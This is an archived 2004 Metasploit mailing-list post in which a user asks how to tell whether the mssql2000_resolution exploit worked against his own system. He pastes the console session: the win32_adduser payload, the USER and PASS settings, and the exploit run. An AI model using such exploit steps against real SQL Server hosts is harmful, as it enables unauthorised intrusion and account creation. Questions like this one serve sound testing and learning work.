Metasploit mailing list archives
mssql 2000 resolution question
From: neil-on-metasploit at restricted.dyndns.org (Neil)
Date: Sun, 19 Sep 2004 10:53:20 -0500
hey guys, I would like to know what I really should see when using msssql2000_resolution if it was successful. I tried it against my system and you can find the output below. And also, why is the "net start sqlserveragent" needed? msf mssql2000_resolution > set PAYLOAD win32_adduser PAYLOAD -> win32_adduser msf mssql2000_resolution(win32_adduser) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ --------- ------------------ required RHOST localhost The target address required RPORT 1434 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required PASS The password for this user optional EXITFUNC seh Exit technique: "process", "thread", "seh" required USER The username to create Target: Windows 2000 msf mssql2000_resolution(win32_adduser) > set PASS pass PASS -> pass msf mssql2000_resolution(win32_adduser) > set USER user USER -> user msf mssql2000_resolution(win32_adduser) > check SQL Server 'XP' on port 1433 msf mssql2000_resolution(win32_adduser) > msf mssql2000_resolution(win32_adduser) > exploit [*] Trying target Windows 2000 with return address 0x42b48774 [*] Execute 'net start sqlserveragent' once access is obtained msf mssql2000_resolution(win32_adduser) > Thanks guys! neil
Current thread:
- mssql 2000 resolution question Neil (Sep 19)